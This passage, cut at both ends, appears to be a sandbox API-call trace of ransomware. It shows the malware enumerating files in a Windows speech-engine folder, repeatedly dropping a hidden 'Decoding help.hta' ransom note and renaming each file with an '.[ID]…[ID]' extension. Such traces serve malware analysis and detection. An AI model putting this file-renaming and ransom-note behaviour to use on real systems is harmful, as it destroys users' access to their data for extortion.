Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" [0059.689] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta")) returned 0xffffffff [0059.689] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.689] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0) returned 0 [0059.689] CloseHandle (hObject=0xffffffff) returned 0 [0059.689] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0059.690] lstrcmpiW (lpString1="Decoding help.hta", lpString2="M1033DSK.LTS") returned -1 [0059.690] lstrlenW (lpString="M1033DSK.LTS") returned 12 [0059.690] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.690] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.690] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="M1033DSK.LTS" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.LTS") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.LTS" [0059.690] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.LTS" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.LTS") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.LTS" [0059.690] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.LTS", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.LTS.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.LTS.[ID]g9uZrLhJaygpwRm1[ID]" [0059.690] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.LTS" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.lts"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.LTS.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.lts.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.690] FindNextFileW (in: hFindFile=0x10fbcd18, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc7f8a49f, ftCreationTime.dwHighDateTime=0x1ca03fd, ftLastAccessTime.dwLowDateTime=0xc7f8a49f, ftLastAccessTime.dwHighDateTime=0x1ca03fd, ftLastWriteTime.dwLowDateTime=0x7dc3f77c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2515b9, dwReserved0=0x0, dwReserved1=0x0, cFileName="M1033DSK.TTS", cAlternateFileName="")) returned 1 [0059.690] lstrcpyW (in: lpString1=0x2a6c00b8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.690] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.690] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" [0059.690] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta")) returned 0xffffffff [0059.690] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.690] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0) returned 0 [0059.690] CloseHandle (hObject=0xffffffff) returned 0 [0059.690] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0059.690] lstrcmpiW (lpString1="Decoding help.hta", lpString2="M1033DSK.TTS") returned -1 [0059.691] lstrlenW (lpString="M1033DSK.TTS") returned 12 [0059.691] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.691] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.691] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="M1033DSK.TTS" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.TTS") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.TTS" [0059.691] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.TTS" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.TTS") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.TTS" [0059.691] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.TTS", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.TTS.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.TTS.[ID]g9uZrLhJaygpwRm1[ID]" [0059.691] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.TTS" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.tts"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.TTS.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.tts.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.698] FindNextFileW (in: hFindFile=0x10fbcd18, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc812d3b4, ftCreationTime.dwHighDateTime=0x1ca03fd, ftLastAccessTime.dwLowDateTime=0xc812d3b4, ftLastAccessTime.dwHighDateTime=0x1ca03fd, ftLastWriteTime.dwLowDateTime=0x7dcfde5c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x2b9e, dwReserved0=0x0, dwReserved1=0x0, cFileName="M1033DSK.UDT", cAlternateFileName="")) returned 1 [0059.698] lstrcpyW (in: lpString1=0x2a6c00b8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.698] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.698] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" [0059.698] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta")) returned 0xffffffff [0059.698] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.698] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0) returned 0 [0059.698] CloseHandle (hObject=0xffffffff) returned 0 [0059.698] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0059.698] lstrcmpiW (lpString1="Decoding help.hta", lpString2="M1033DSK.UDT") returned -1 [0059.698] lstrlenW (lpString="M1033DSK.UDT") returned 12 [0059.698] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.698] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.698] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="M1033DSK.UDT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UDT") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UDT" [0059.698] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UDT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UDT") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UDT" [0059.699] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UDT", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UDT.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UDT.[ID]g9uZrLhJaygpwRm1[ID]" [0059.699] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UDT" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.udt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UDT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.udt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.699] FindNextFileW (in: hFindFile=0x10fbcd18, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc8153513, ftCreationTime.dwHighDateTime=0x1ca03fd, ftLastAccessTime.dwLowDateTime=0xc8153513, ftLastAccessTime.dwHighDateTime=0x1ca03fd, ftLastWriteTime.dwLowDateTime=0x7df1319c, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x308e50, dwReserved0=0x0, dwReserved1=0x0, cFileName="M1033DSK.UNT", cAlternateFileName="")) returned 1 [0059.699] lstrcpyW (in: lpString1=0x2a6c00b8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.699] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.699] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" [0059.699] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta")) returned 0xffffffff [0059.699] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.699] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0) returned 0 [0059.699] CloseHandle (hObject=0xffffffff) returned 0 [0059.699] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0059.699] lstrcmpiW (lpString1="Decoding help.hta", lpString2="M1033DSK.UNT") returned -1 [0059.699] lstrlenW (lpString="M1033DSK.UNT") returned 12 [0059.699] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.699] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.699] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="M1033DSK.UNT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UNT") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UNT" [0059.699] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UNT" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UNT") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UNT" [0059.700] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UNT", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UNT.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UNT.[ID]g9uZrLhJaygpwRm1[ID]" [0059.700] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UNT" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.unt"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.UNT.[ID]g9uZrLhJaygpwRm1[ID]" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.unt.[id]g9uzrlhjaygpwrm1[id]")) returned 0 [0059.700] FindNextFileW (in: hFindFile=0x10fbcd18, lpFindFileData=0x92cfd30 | out: lpFindFileData=0x92cfd30*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0xc82d02c9, ftCreationTime.dwHighDateTime=0x1ca03fd, ftLastAccessTime.dwLowDateTime=0xc82d02c9, ftLastAccessTime.dwHighDateTime=0x1ca03fd, ftLastWriteTime.dwLowDateTime=0x7dff79dc, ftLastWriteTime.dwHighDateTime=0x1c9ea13, nFileSizeHigh=0x0, nFileSizeLow=0x36e466, dwReserved0=0x0, dwReserved1=0x0, cFileName="M1033DSK.WIH", cAlternateFileName="")) returned 1 [0059.700] lstrcpyW (in: lpString1=0x2a6c00b8, lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.700] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.700] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="Decoding help.hta" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" [0059.700] GetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta")) returned 0xffffffff [0059.700] CreateFileW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\decoding help.hta"), dwDesiredAccess=0x40000000, dwShareMode=0x2, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x0, hTemplateFile=0x0) returned 0xffffffff [0059.700] WriteFile (in: hFile=0xffffffff, lpBuffer=0x403006, nNumberOfBytesToWrite=0x78e, lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0 | out: lpNumberOfBytesWritten=0x92cfcf8, lpOverlapped=0x0) returned 0 [0059.700] CloseHandle (hObject=0xffffffff) returned 0 [0059.700] SetFileAttributesW (lpFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\Decoding help.hta", dwFileAttributes=0x1) returned 0 [0059.700] lstrcmpiW (lpString1="Decoding help.hta", lpString2="M1033DSK.WIH") returned -1 [0059.700] lstrlenW (lpString="M1033DSK.WIH") returned 12 [0059.700] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*" [0059.700] lstrlenW (lpString="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\*.*") returned 87 [0059.700] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\", lpString2="M1033DSK.WIH" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.WIH") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.WIH" [0059.700] lstrcatW (in: lpString1="", lpString2="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.WIH" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.WIH") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.WIH" [0059.701] lstrcatW (in: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.WIH", lpString2=".[ID]g9uZrLhJaygpwRm1[ID]" | out: lpString1="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.WIH.[ID]g9uZrLhJaygpwRm1[ID]") returned="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.WIH.[ID]g9uZrLhJaygpwRm1[ID]" [0059.701] MoveFileW (lpExistingFileName="\\\\?\\C:\\Program Files (x86)\\Common Files\\SpeechEngines\\Microsoft\\TTS20\\en-US\\enu-dsk\\M1033DSK.WIH" (normalized: "c:\\program files (x86)\\common files\\speechengines\\microsoft\\tts20\\en-us\\enu-dsk\\m1033dsk.wih"), lpNewFileName="\\\\?\\C:\\Program Files (x86)\\Common 